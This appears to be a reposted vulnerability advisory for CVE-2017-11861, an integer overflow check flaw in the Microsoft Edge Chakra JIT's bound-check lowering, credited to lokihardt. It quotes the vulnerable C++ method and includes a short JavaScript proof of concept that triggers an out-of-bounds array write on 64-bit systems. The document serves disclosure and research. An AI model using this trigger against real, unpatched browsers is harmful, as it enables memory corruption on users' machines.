Below is a copy: Microsoft Edge Charka JIT Incorrect Check
Microsoft Edge: Chakra: JIT: Incorrect integer overflow check in Lowerer::LowerBoundCheck
CVE-2017-11861
Here's a snippet of the method.
void Lowerer::LowerBoundCheck(IR::Instr *const instr)
{
...
if(rightOpnd->IsIntConstOpnd())
{
IntConstType newOffset;
if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a)
{
offset = newOffset;
rightOpnd = nullptr;
offsetOpnd = nullptr;
}
}
...
if(!rightOpnd)
{
rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func);
}
}
At (a), it uses "IntConstMath::Add" to check integer overflow. But the size of IntConstType equals to the size of pointer, and the "offset" variable is used as a 32-bit integer. So it may fail to check integer overflow on 64-bit system.
PoC:
function f() {
let arr = new Uint32Array(0x1000);
for (let i = 0; i < 0x7fffffff;) {
arr[++i] = 0x1234;
}
}
f();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum